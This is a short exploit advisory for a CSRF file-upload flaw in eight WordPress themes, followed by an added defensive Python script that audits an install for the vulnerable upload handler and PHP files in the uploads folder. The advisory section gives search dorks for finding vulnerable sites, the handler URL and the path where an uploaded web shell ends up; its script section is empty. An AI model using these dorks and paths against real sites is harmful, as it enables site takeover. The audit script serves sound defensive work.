#Dork :
inurl:"/wp-content/themes/agritourismo-theme/"
inurl:"/wp-content/themes/bordeaux-theme/"
inurl:"/wp-content/themes/bulteno-theme/"
inurl:"/wp-content/themes/oxygen-theme/"
inurl:"/wp-content/themes/radial-theme/"
inurl:"/wp-content/themes/rayoflight-theme/"
inurl:"/wp-content/themes/reganto-theme/"
inurl:"/wp-content/themes/rockstar-theme/"
CSRF File Upload Vulnerability
Exploit & POC :
http://site-target/wp-content/themes/rockstar-theme/functions/upload-handler.php
Script :
File Access :
http://site-target/wp-content/uploads/[years]/[month]/your_shell.php
Example : http://127.0.0.1/wp-content/uploads/2013/13/inc0vers.php
Note :
The CSRF script must match the theme from the dork you use.
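
For site owners, a check for the two artifacts this advisory names: the theme's upload-handler.php and PHP files under wp-content/uploads. This is an added example, not part of the original advisory; the handler path appears on the page only for rockstar-theme and is assumed to be the same in the other listed themes, and the PHP extension list is also an assumption.

```python
"""Defensive audit of a WordPress install (added example, not from the advisory)."""
import sys
from pathlib import Path

# Theme directories named in the advisory's dork list.
AFFECTED_THEMES = [
    "agritourismo-theme", "bordeaux-theme", "bulteno-theme", "oxygen-theme",
    "radial-theme", "rayoflight-theme", "reganto-theme", "rockstar-theme",
]
# Handler path as shown for rockstar-theme; assumed identical in the other themes.
HANDLER = Path("functions") / "upload-handler.php"
# Extensions commonly executed as PHP (an assumption; match your server config).
PHP_EXTS = {".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar"}


def find_exposed_handlers(wp_root):
    """Return upload-handler.php files present under the affected themes."""
    themes = Path(wp_root) / "wp-content" / "themes"
    return sorted(p for t in AFFECTED_THEMES if (p := themes / t / HANDLER).is_file())


def find_php_in_uploads(wp_root):
    """Return files in wp-content/uploads with a PHP-executable extension.

    Every suffix is checked, so names like name.php.jpg are reported too.
    """
    uploads = Path(wp_root) / "wp-content" / "uploads"
    if not uploads.is_dir():
        return []
    return sorted(
        p for p in uploads.rglob("*")
        if p.is_file() and any(s.lower() in PHP_EXTS for s in p.suffixes)
    )


def audit(wp_root):
    """Collect both findings for one WordPress root."""
    return {
        "handlers": find_exposed_handlers(wp_root),
        "php_in_uploads": find_php_in_uploads(wp_root),
    }


if __name__ == "__main__":
    report = audit(sys.argv[1] if len(sys.argv) > 1 else ".")
    for kind, paths in report.items():
        for path in paths:
            print(f"{kind}: {path}")
    sys.exit(1 if any(report.values()) else 0)
```

Run it with the WordPress root as the only argument; a non-zero exit status means at least one finding needs review.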